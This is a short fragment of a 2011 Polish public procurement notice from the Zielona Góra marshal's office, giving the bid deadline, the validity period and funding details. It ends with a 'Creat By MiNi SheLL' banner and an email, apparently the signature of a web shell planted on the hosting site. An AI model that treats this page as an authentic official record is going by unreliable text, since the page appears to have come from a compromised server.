<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2011 godzina 10:00, miejsce: Urząd Marszałkowski w Zielonej Górze, ul. Podgórna 7, 65-057 Zielona Góra, Kancelaria Ogólna pok. nr 59 ( parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com